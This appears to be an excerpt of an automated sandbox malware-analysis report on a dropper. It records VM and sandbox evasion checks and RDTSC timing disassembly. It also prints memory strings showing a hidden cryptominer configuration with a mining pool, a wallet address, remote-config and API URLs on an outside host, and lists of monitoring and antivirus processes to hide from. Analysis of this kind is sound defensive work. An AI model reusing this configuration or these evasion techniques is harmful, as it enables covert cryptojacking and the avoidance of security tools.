                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-11982
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9686
                          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Query firmware table information (likely to detect VMs)
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
                          Tries to detect sandboxes / dynamic malware analysis system (registry check)
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: svchost.exe, 00000035.00000002.3340783820.0000022088280000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                          Source: svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/P.TXTTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/API/ENDPOINT.PHPVOHVTBTKKQQPCGVY
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: S="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="AODEFROMLPUG.SYS" --RANDOMX-NO-RDMSR --CINIT-REMOTE-CONFIG="HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/P.TXT" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --NICEHASH --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="VOHVTBTKKQQPCGVY"
                          Source: svchost.exe, 00000035.00000003.2524262269.000002208828E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WOO097878781.WIN46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJBSTEALTH-TARGETSTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEMSMPENG.EXE,V3SVC.EXE,VSSERV.EXE,ASHDISP.EXE,AVGNSX.EXE,AVGUARD.EXE,VSSERV.EXE,BDAGENT.EXE,BULLGUARD.EXE,CMDAGENT.EXE,DWENGINE.EXE,A2SERVICE.EXE,EKRN.EXE,FSMA32.EXE,AVKCL.EXE,K7TSMNGR.EXE,AVP.EXE,MBAMSERVICE.EXE,MCSHIELD.EXE,NORTONSECURITY.EXE,PAVSRVX86.EXE,SAVSERVICE.EXE,COREFRAMEWORKHOST.EXE,SBAMSVC.EXE,VSMON.EXE,ARCASERVICE.EXE,SCANNERSERVER.EXE,NANOSVC.EXE,IKARUSGUARDX86.EXE,ZILLYASERVICE.EXE,SECUREAGEAPEX.EXE,IMMUNETPROTECT.EXE,WRSA.EXE,PANDADOME.EXE,CLAMD.EXE,360SAFE.EXE,QQPCTRAY.EXE,TOTALAVSERVICE.EXE,BAIDUSDTRAY.EXE,NPSSVC.EXE,CYSERV.EXE,VIPRETRAY.EXESTEALTH-FULLSCREENALGO
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                          Source: svchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMMUNETPROTECT.EXEXETOTALAVSERVICE.EXEEEXEPROCESSHACKER.EXEEEXEE
                          Source: svchost.exe, 00000035.00000003.2524558763.000002208825E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:443--USER=46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB--PASS=--CPU-MAX-THREADS-HINT=90--CINIT-WINRING=AODEFROMLPUG.SYS--RANDOMX-NO-RDMSR--CINIT-REMOTE-CONFIG=HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/P.TXT--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTPS://ZEALOUS-ROENTGEN.66-63-187-122.PLESK.PAGE/66/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--NICEHASH--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=90--CINIT-ID=VOHVTBTKKQQPCGVY
                          Source: svchost.exe, 00000035.00000003.2538990041.000002208826A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3336245903.0000022088266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                          Source: svchost.exe, 00000035.00000002.3340783820.0000022088280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CHROME.EXEECHROME.EXEEXESECUREAGEAPEX.EXEEEXEEPROCESSHACKER.EXEEEXENZL6O1Q.EXEEE
                          Source: svchost.exe, 00000035.00000003.2538990041.000002208826A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524262269.000002208828E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3336245903.0000022088266000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF56A second address: EBF56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF56E second address: EBEDAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC408FC8B0Bh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f or dword ptr [ebp+122D2A80h], edi 0x00000015 push dword ptr [ebp+122D1149h] 0x0000001b stc 0x0000001c call dword ptr [ebp+122D2AC1h] 0x00000022 pushad 0x00000023 cld 0x00000024 xor eax, eax 0x00000026 clc 0x00000027 jg 00007FC408FC8B0Ch 0x0000002d or dword ptr [ebp+122D2AA3h], edx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 clc 0x00000038 mov dword ptr [ebp+122D2E36h], eax 0x0000003e jnl 00007FC408FC8B0Eh 0x00000044 pushad 0x00000045 mov dword ptr [ebp+122D2780h], edx 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2B3Fh], eax 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b mov dword ptr [ebp+122D2B3Fh], eax 0x00000061 lodsw 0x00000063 pushad 0x00000064 mov ecx, 2E1E0C30h 0x00000069 xor ebx, dword ptr [ebp+122D2E2Eh] 0x0000006f popad 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jmp 00007FC408FC8B19h 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d mov dword ptr [ebp+122D2780h], esi 0x00000083 push eax 0x00000084 push eax 0x00000085 push edx 0x00000086 pushad 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBEDAA second address: EBEDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBEDB0 second address: EBEDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033700 second address: 1033719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Fh 0x00000007 jng 00007FC408FC7016h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033853 second address: 1033860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC408FC8B06h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033860 second address: 1033868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10339D9 second address: 10339DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10339DE second address: 1033A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FC408FC7016h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC408FC7028h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033B39 second address: 1033B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033B3D second address: 1033B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC408FC701Eh 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033B51 second address: 1033B5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FC408FC8B06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033B5C second address: 1033B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC408FC7028h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FC408FC701Ch 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033B8B second address: 1033B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036AD6 second address: 1036B1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jnp 00007FC408FC701Ch 0x00000013 push 00000000h 0x00000015 and edx, dword ptr [ebp+122D2E92h] 0x0000001b push 34EF2680h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC408FC701Ch 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036B1B second address: 1036B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC408FC8B13h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 34EF2600h 0x00000014 adc esi, 6D3FC154h 0x0000001a push 00000003h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FC408FC8B08h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 and si, 8C7Fh 0x0000003b push 00000000h 0x0000003d pushad 0x0000003e jo 00007FC408FC8B08h 0x00000044 push ebx 0x00000045 pop ebx 0x00000046 mov cx, si 0x00000049 popad 0x0000004a push 00000003h 0x0000004c mov dword ptr [ebp+122D1CB4h], ebx 0x00000052 call 00007FC408FC8B09h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036B91 second address: 1036B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036B95 second address: 1036BB3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FC408FC8B08h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FC408FC8B0Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036BB3 second address: 1036BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036BB7 second address: 1036BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036BBD second address: 1036C00 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC408FC7016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 jmp 00007FC408FC7029h 0x00000016 pop esi 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC408FC7024h 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036C00 second address: 1036C5C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC408FC8B0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007FC408FC8B17h 0x00000013 pop eax 0x00000014 pushad 0x00000015 xor esi, 3FEA8B8Ch 0x0000001b jmp 00007FC408FC8B12h 0x00000020 popad 0x00000021 lea ebx, dword ptr [ebp+1244B9B1h] 0x00000027 sbb ch, 0000004Ch 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jne 00007FC408FC8B06h 0x00000034 push esi 0x00000035 pop esi 0x00000036 popad 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036C5C second address: 1036C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jnc 00007FC408FC7016h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036D2A second address: 1036D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036D37 second address: 1036D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036D3B second address: 1036D41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036D41 second address: 1036D95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jne 00007FC408FC7033h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jp 00007FC408FC7023h 0x0000001b jmp 00007FC408FC701Dh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036D95 second address: 1036D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036D9B second address: 1036DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036DA4 second address: 1036DD8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+122D2C26h] 0x0000000e push 00000003h 0x00000010 stc 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D2780h], edi 0x00000019 push 00000003h 0x0000001b or dword ptr [ebp+122D1D9Fh], edi 0x00000021 mov dx, BB95h 0x00000025 push 9368DE5Eh 0x0000002a push eax 0x0000002b push edx 0x0000002c push esi 0x0000002d je 00007FC408FC8B06h 0x00000033 pop esi 0x00000034 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036DD8 second address: 1036DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC408FC7016h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036E3F second address: 1036ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FC408FC8B08h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 cmc 0x00000027 add eax, 6C814A31h 0x0000002d popad 0x0000002e push 17D473D0h 0x00000033 js 00007FC408FC8B0Eh 0x00000039 xor dword ptr [esp], 17D47350h 0x00000040 push 00000003h 0x00000042 mov di, 5431h 0x00000046 push 00000000h 0x00000048 jmp 00007FC408FC8B0Ch 0x0000004d push 00000003h 0x0000004f mov dword ptr [ebp+122D1DB4h], ebx 0x00000055 or dword ptr [ebp+122D1D9Fh], edi 0x0000005b push 8911E381h 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FC408FC8B18h 0x00000068 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058318 second address: 105831F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028261 second address: 1028265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
